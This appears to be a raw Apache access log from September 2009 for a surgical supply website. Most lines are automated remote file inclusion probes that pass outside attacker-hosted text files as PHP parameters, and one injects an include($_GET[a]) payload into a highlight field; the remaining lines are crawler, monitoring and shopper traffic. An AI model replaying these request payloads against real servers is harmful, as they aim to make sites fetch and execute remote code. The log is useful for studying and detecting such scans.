190.144.44.36 - - [12/Sep/2009:01:56:36 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:37 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:37 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:41 -0400] "GET /logs/access_log.Q109081600%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:41 -0400] "GET /logs/access_log.Q109081600//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:44 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:44 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:45 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:45 -0400] "GET /logs/access_log.Q109081600%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:46 -0400] "GET /logs/access_log.Q109062000//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:45 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:49 -0400] "GET /logs/access_log.Q109062000//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:53 -0400] "GET /logs/access_log.Q109062000//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:36 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:56:55 -0400] "GET //include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:56:55 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:56:55 -0400] "GET /logs//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:58 -0400] "GET /logs/access_log.Q109062000%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:59 -0400] "GET //?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:59 -0400] "GET /logs/access_log.Q109081600%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:56:59 -0400] "GET /logs//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 200 17503 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:57:07 -0400] "GET /logs/access_log.Q109062000%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:01:57:10 -0400] "GET /logs/access_log.Q109062000%20%20//?_SERVERDOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:01:57:50 -0400] "GET /logs/access_log.Q109080100//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:01:58:29 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [12/Sep/2009:02:00:18 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:00:40 -0400] "GET /logs/access_log.Q109080100%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:01:10 -0400] "GET //galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:01:10 -0400] "GET /logs/access_log.Q109051800//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:01:10 -0400] "GET /logs//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
70.90.108.169 - - [12/Sep/2009:02:01:13 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:01:21 -0400] "GET /logs/access_log.Q109062000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
119.63.193.55 - - [12/Sep/2009:02:01:57 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
209.59.12.99 - - [12/Sep/2009:02:03:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [12/Sep/2009:02:03:42 -0400] "GET /logs/access_log.Q109051800%20//include/write.php?dir=http://www.artguide.co.il/guides/admin.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
72.11.145.8 - - [12/Sep/2009:02:03:42 -0400] "GET /logs//include/write.php?dir=http://www.artguide.co.il/guides/admin.txt???? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
72.11.145.8 - - [12/Sep/2009:02:03:44 -0400] "GET //include/write.php?dir=http://www.artguide.co.il/guides/admin.txt???? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
66.249.71.201 - - [12/Sep/2009:02:05:37 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109194D0587F3009D45016+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.11.145.8 - - [12/Sep/2009:02:05:48 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
66.249.71.16 - - [12/Sep/2009:02:05:48 -0400] "GET /robots.txt HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.16 - - [12/Sep/2009:02:05:48 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0109194D055783009D45016+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
72.11.145.8 - - [12/Sep/2009:02:05:49 -0400] "GET /logs/access_log.Q109080100%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:06:45 -0400] "GET //include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:06:45 -0400] "GET /logs//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:06:45 -0400] "GET /logs/access_log.Q109072200//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:45 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:45 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:45 -0400] "GET /logs/access_log.Q109051700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:50 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:50 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:50 -0400] "GET /logs/access_log.Q109051700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:55 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:55 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:06:55 -0400] "GET /logs/access_log.Q109051700//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:23 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:23 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:23 -0400] "GET /logs/access_log.Q109051700%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:33 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:33 -0400] "GET /logs/access_log.Q109051700%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:33 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:07:49 -0400] "GET /logs/access_log.Q109080100//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:52 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:52 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:07:52 -0400] "GET /logs/access_log.Q109051700%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:08:14 -0400] "GET /logs/access_log.Q109052500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:08:17 -0400] "GET /logs/access_log.Q109052500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:08:17 -0400] "GET /logs/access_log.Q109052500%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:08:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [12/Sep/2009:02:08:55 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
72.11.145.8 - - [12/Sep/2009:02:09:04 -0400] "GET /logs/access_log.Q109080100%20%20//include/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:03 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:03 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:03 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:02:13:05 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:02:13:05 -0400] "GET /logs/access_log.Q109090400//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
211.238.14.183 - - [12/Sep/2009:02:13:05 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:23 -0400] "GET //include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:23 -0400] "GET /logs/access_log.Q109090400%20%20//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
121.130.29.11 - - [12/Sep/2009:02:13:23 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://old.enet.or.kr/v2/bbs//id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Sep/2009:02:13:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
204.30.3.225 - - [12/Sep/2009:02:16:40 -0400] "GET /logs//index.php?option=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Sep/2009:02:16:40 -0400] "GET /logs/access_log.Q109072100%20%20//index.php?option=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.238.29.36 - - [12/Sep/2009:02:16:43 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:16:44 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.110.11.75 - - [12/Sep/2009:02:16:44 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:16:44 -0400] "GET /logs/access_log.Q109072200//bbs//skin/ggambo7002_board/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
211.110.11.75 - - [12/Sep/2009:02:16:44 -0400] "GET /logs/access_log.Q109072500//bbs//skin/ggambo7002_board/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
88.238.29.36 - - [12/Sep/2009:02:16:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:16:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.110.11.75 - - [12/Sep/2009:02:16:45 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:48 -0400] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:48 -0400] "GET /logs///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:48 -0400] "GET /logs/access_log.Q109052200///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:54 -0400] "GET ///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:54 -0400] "GET /logs///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:16:54 -0400] "GET /logs/access_log.Q109052200///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
204.30.3.225 - - [12/Sep/2009:02:16:55 -0400] "GET //index.php?option=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Sep/2009:02:17:00 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Sep/2009:02:17:00 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
121.78.116.209 - - [12/Sep/2009:02:17:14 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
220.181.7.61 - - [12/Sep/2009:02:17:19 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
190.144.44.36 - - [12/Sep/2009:02:17:31 -0400] "GET /logs/access_log.Q109052200%20%20///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:17:34 -0400] "GET /logs/access_log.Q109052200%20%20///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:17:36 -0400] "GET /logs/access_log.Q109052500%20%20///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
190.144.44.36 - - [12/Sep/2009:02:17:38 -0400] "GET /logs/access_log.Q109052500%20%20///modules/My_eGallery/public/displayCategory.php?basepath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
88.238.29.36 - - [12/Sep/2009:02:17:46 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 73507 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
88.238.29.36 - - [12/Sep/2009:02:17:48 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
